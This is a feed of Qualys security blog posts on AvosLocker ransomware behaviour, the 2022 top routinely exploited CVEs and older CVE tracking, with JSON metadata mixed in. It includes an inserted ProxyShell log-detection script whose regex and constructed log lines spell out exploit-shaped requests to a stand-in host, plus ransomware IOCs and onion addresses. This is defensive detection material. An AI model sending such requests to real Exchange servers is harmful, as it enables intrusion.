23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\nFig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\nFig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\nFig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\nFig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\nFig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\nFig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\nFig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\nFig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\nFig. 
32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of the Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information, along with the encryption key used, appears to be encrypted and then Base64-encoded. This encoded information is added at the end of each encrypted file (fig. 33).\n\nFig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\nFig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE\u201d. The content of this ransom note is shown in figure 35.\n\nFig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system while encryption is in progress, to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution (T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact (T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery (T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.'s CISA, NSA, and FBI; Canada's CCCS; U.K.'s NCSC-UK; Australia's ACSC; and New Zealand's NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. 
The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumerations (CWEs). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to the vulnerabilities prevalent in their specific targets' networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits that chain multiple CVEs. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPN flaw CVE-2018-13379 and widespread vulnerabilities such as Apache's Log4Shell (CVE-2021-44228). 
They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine and VMware. The exploitation often resulted from organizations' failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 
100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities could lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a path traversal flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as the ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could give cyber criminals initial network access, enabling follow-on activity such as data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities could compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, a flaw in Apache's Log4j Java library, can lead to total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian's Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. 
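The ProxyShell entries above (CVE-2021-34473 chained with CVE-2021-34523 and CVE-2021-31207) hinge on a pre-authentication path-confusion request to Exchange's Autodiscover endpoint, and the advisory's point that such chains are detectable in traffic applies just as well to the web server's own logs. As an added example, not code from the advisory or from Qualys, the script below flags that request shape in IIS W3C logs: a request to `/autodiscover/autodiscover.json` whose query smuggles a backend path such as `/mapi/nspi` or `/PowerShell` behind an `@`. The pattern comes from public ProxyShell analyses rather than from this page, the column layout is read from the log's own `#Fields:` header, and the log lines are constructed.

```python
"""Flag ProxyShell (CVE-2021-34473) path-confusion requests in IIS W3C logs.

Added example, not code from the advisory or from Qualys. The request
shape it matches comes from public ProxyShell analyses: a request to
/autodiscover/autodiscover.json whose query smuggles a backend path such
as /mapi/nspi or /PowerShell behind an "@". SAMPLE_LOG is constructed.
"""
import re

# "@host/mapi/..." in the query string: the backend the front end is tricked
# into proxying the unauthenticated request to.
_BACKEND = re.compile(r"@[^/\s]*/(mapi/|powershell|ews/|ecp/|owa/)", re.IGNORECASE)

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-12 10:01:02 10.0.0.5 POST /autodiscover/autodiscover.xml - 443 CORP\\alice 10.0.1.7 Microsoft+Office/16.0 200
2021-08-12 10:01:09 10.0.0.5 GET /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 203.0.113.9 python-requests/2.25.1 200
2021-08-12 10:01:11 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/PowerShell?X-Rps-CAT=AAAA 443 - 203.0.113.9 python-requests/2.25.1 200
2021-08-12 10:02:30 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example%2fowa 443 - 10.0.1.8 Mozilla/5.0 200
"""


def parse_w3c(text: str):
    """Yield (line number, {field: value}) using the #Fields header, so the
    detector does not depend on a fixed column layout."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError(f"line {lineno}: data before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed; a production tool should count and report these
        yield lineno, dict(zip(fields, values))


def is_proxyshell(rec: dict) -> bool:
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "").lower()
    if "/autodiscover/autodiscover.json" not in stem:
        return False
    # Either signal alone is suspicious; real exploit traffic usually carries both.
    return bool(_BACKEND.search(query)) or "email=autodiscover/autodiscover.json" in query


def find_proxyshell(text: str):
    """[(line number, client IP, full URL)] for matching requests."""
    return [
        (n, rec.get("c-ip", "-"), rec["cs-uri-stem"] + "?" + rec["cs-uri-query"])
        for n, rec in parse_w3c(text)
        if is_proxyshell(rec)
    ]


if __name__ == "__main__":
    for n, ip, url in find_proxyshell(SAMPLE_LOG):
        print(f"line {n} from {ip}: {url}")
```

Feed it the `u_ex*.log` files from the Exchange front end; a hit with a 200 status against `/PowerShell` is the stage of the chain where the attacker already holds a token, so those client addresses are the ones to pivot on first.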

### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**

Our data on patching behavior for these 12 significant vulnerabilities is pulled from the Qualys TruRisk Platform. It is anonymized so that no analysis can be traced back to a specific organization or asset.

The data highlights a prominent challenge: some vulnerabilities see rapid mitigation, reflecting proactive security measures, while others face prolonged remediation times, raising concerns about exposure. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot, contrasting patch rates and remediation times for the 12 frequently exploited vulnerabilities in 2022, illustrates this point: while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This reinforces the need for timely vulnerability management, carried out with speed and diligence, especially for high-risk vulnerabilities.

Fig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022

The damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights.
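The patch-rate and remediation-time metrics behind a chart like Fig 1 are straightforward to compute from per-asset findings. The following Python is an added example written for this page, not Qualys code and not a TruRisk Platform API: it takes findings (asset, CVE, first-found date, fixed date or None) and returns, per CVE, the patch rate, the mean days to remediate for fixed findings and the mean age of findings still open, then orders the CVEs for remediation owners. The Finding records are constructed sample data that reuse three CVE names from the table above; the dates, the assets and the priority-ordering rule are assumptions, not Qualys data or a Qualys scoring method.

```python
"""Patch rate and remediation time per CVE, computed from per-asset findings.

Added example for this page (not Qualys code or a Qualys API). The findings
below are constructed sample data; the CVE names come from the table of
12 routinely exploited vulnerabilities above.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date
from statistics import fmean
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class Finding:
    """One vulnerability detection on one asset."""
    asset: str
    cve: str
    first_found: date
    fixed: Optional[date]  # None while the finding is still open


@dataclass(frozen=True)
class CveMetrics:
    cve: str
    total: int
    fixed: int
    patch_rate: float                      # fixed / total
    avg_remediation_days: Optional[float]  # mean(fixed - first_found) over fixed findings
    avg_open_age_days: Optional[float]     # mean(as_of - first_found) over open findings


def remediation_metrics(findings: Iterable[Finding], as_of: date) -> Dict[str, CveMetrics]:
    """Group findings by CVE and compute patch rate, remediation time and open exposure age."""
    by_cve: Dict[str, List[Finding]] = defaultdict(list)
    for f in findings:
        if f.fixed is not None and f.fixed < f.first_found:
            raise ValueError(f"{f.asset}/{f.cve}: fixed date precedes first-found date")
        by_cve[f.cve].append(f)

    metrics: Dict[str, CveMetrics] = {}
    for cve, items in by_cve.items():
        fixed_days = [(f.fixed - f.first_found).days for f in items if f.fixed is not None]
        open_days = [(as_of - f.first_found).days for f in items if f.fixed is None]
        metrics[cve] = CveMetrics(
            cve=cve,
            total=len(items),
            fixed=len(fixed_days),
            patch_rate=len(fixed_days) / len(items),
            avg_remediation_days=fmean(fixed_days) if fixed_days else None,
            avg_open_age_days=fmean(open_days) if open_days else None,
        )
    return metrics


def remediation_priority(metrics: Dict[str, CveMetrics]) -> List[CveMetrics]:
    """Order CVEs for remediation owners: lowest patch rate first, then the oldest
    open exposure. This ordering rule is an assumption made for the example; it is
    not a Qualys TruRisk or QDS calculation."""
    return sorted(metrics.values(),
                  key=lambda m: (m.patch_rate, -(m.avg_open_age_days or 0.0), m.cve))


# Constructed sample findings (assets, dates and outcomes are made up).
SAMPLE_FINDINGS = [
    Finding("web-01", "CVE-2021-44228", date(2022, 1, 3), date(2022, 1, 5)),
    Finding("web-02", "CVE-2021-44228", date(2022, 1, 3), date(2022, 1, 9)),
    Finding("web-03", "CVE-2021-44228", date(2022, 1, 4), date(2022, 1, 18)),
    Finding("app-01", "CVE-2021-44228", date(2022, 1, 4), None),
    Finding("vpn-01", "CVE-2018-13379", date(2022, 2, 1), None),
    Finding("vpn-02", "CVE-2018-13379", date(2022, 2, 1), date(2022, 6, 1)),
    Finding("vpn-03", "CVE-2018-13379", date(2022, 3, 15), None),
    Finding("ws-01", "CVE-2022-30190", date(2022, 6, 1), date(2022, 6, 15)),
    Finding("ws-02", "CVE-2022-30190", date(2022, 6, 1), date(2022, 6, 15)),
]
AS_OF = date(2022, 12, 31)

if __name__ == "__main__":
    for m in remediation_priority(remediation_metrics(SAMPLE_FINDINGS, AS_OF)):
        print(f"{m.cve:16} patched {m.fixed}/{m.total} ({m.patch_rate:.0%})  "
              f"avg days to fix: {m.avg_remediation_days}  avg open age: {m.avg_open_age_days}")
```

Reporting the mean open age next to the patch rate is what separates "slow but finished" from "never started": in the sample, CVE-2018-13379 has both the lowest patch rate and the oldest open findings, so it sorts first regardless of how fast the one fixed instance was closed.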

### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines**

The recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known exploited vulnerabilities, performing automated asset discovery, and implementing centralized patch management.

Qualys' suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) provides 360-degree visibility of assets, aligning with the CSA's call for comprehensive asset discovery. Qualys Patch Management offers an automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys' unified platform, organizations can efficiently adhere to the international best practices outlined in the CSA, enhancing their defense against cyber threats.

In addition, the joint CSA stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection.

Qualys Threat Protection aligns with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats.
Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA's guidelines and achieve a fortified security posture.

Qualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It leverages an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments while bypassing the limitations of signature-based systems.

Fig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022

The [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON, zipped) gives organizations complete visibility into open vulnerabilities, focusing on the organization's global risk score, high-risk vulnerabilities, and top exploited vulnerabilities. Once you have identified the vulnerable assets for these top CVEs and prioritized them among your remediation owners, you can immediately use Qualys Patch Management to reduce the risk.

In conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routinely exploited vulnerabilities. Qualys provides robust solutions that align with the CSA's recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities. Consequently, organizations can strengthen their defenses against cyber threats by adhering to CSA guidelines and leveraging comprehensive cybersecurity solutions like those from Qualys.

## References

[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)

## Additional Contributors

 * Ramesh Ramachandran, Principal Product Manager, Qualys
 * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys

(Qualys Blog, "Qualys Tackles 2022's Top Routinely Exploited Cyber Vulnerabilities", published 2023-08-24, <https://blog.qualys.com/category/qualys-insights>)

## Top 19+ Vulnerability CVEs in Santa's Dashboard Tracking

(Qualys Blog, published 2019-12-27, <https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking>)

[A 
recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.

The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into which assets and vulnerabilities in your organization are at risk.

**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors**
---|---|---|---|---
**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea)
**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran)
**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea)
**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime)
**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea)
**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown
**9** | CVE-2017-8759 | Microsoft .NET Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China)
**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran)
**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran)
**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru)
**13** | CVE-2012-0158 | Microsoft | N/A; 9.3\* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China)
**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China)
**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China)
**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China)
**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China)
**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China)
**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime)

\* according to [cvedetails.com](<http://cvedetails.com/>)

### Detecting the Top 19 CVEs

Qualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).

To return a list of all impacted hosts, use the following QQL query within the VM Dashboard:

    vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]

You can [import 
the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:

[Dashboard template: Top 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>)

### Alerts

The Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and to be alerted for your most critical assets.

See how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).

### Tracking Per-Year Environment Impact and Remediation

The Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard is included in release 2.42 and can be found in the dashboard templates library. It automatically shows your systems whether they are scanned internally, externally, or on remote mobile computers with the Qualys Cloud Agent.

This Per-Year Environment Insight View Dashboard displays data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTIs) from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.

### Get Started Now

To start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).

Visit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.

(Qualys Blog, "Top 19+ Vulnerability CVEs in Santa's Dashboard Tracking", published 2019-12-27, <https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking>)

With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI's 2020 Internet Crime Report, 2,400+ ransomware-related incidents in 2020 resulted in losses of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.

Ransomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:

 * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or links, and via stolen or weak Remote Desktop Protocol (RDP) credentials.
 * [Nefilim Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups, by brute-forcing them, and by using other known vulnerabilities for initial access, such as those in Citrix gateway devices.
 * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.
 * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>): DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the Remote Desktop Protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.
 * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>): MSU administrators were given a week to pay an undisclosed ransom to decrypt their files. If MSU officials refused to pay or chose to restore from backups, the cybercriminals were prepared to leak documents stolen from the university's network on a website the group operates on the dark web.
 * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>): DearCry ransomware attacks exploited the Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available, forcing Microsoft to release out-of-band updates.
 * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>): Colonial Pipeline was hit by DarkSide ransomware in May 2021. In the linked testimony, the company's CEO said the attackers got in using a compromised password for a legacy VPN account that did not have multi-factor authentication. Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the East Coast.

As seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.

To help organizations combat risks from ransomware, Qualys is introducing the Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages security intelligence curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:

 * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), and risky software in the datacenter environment, along with alerting for assets missing anti-malware solutions.
 * Accelerate remediation of ransomware exposures with zero-touch patching by continuously patching ransomware-related vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date.

#### **Ransomware Infection Vectors**

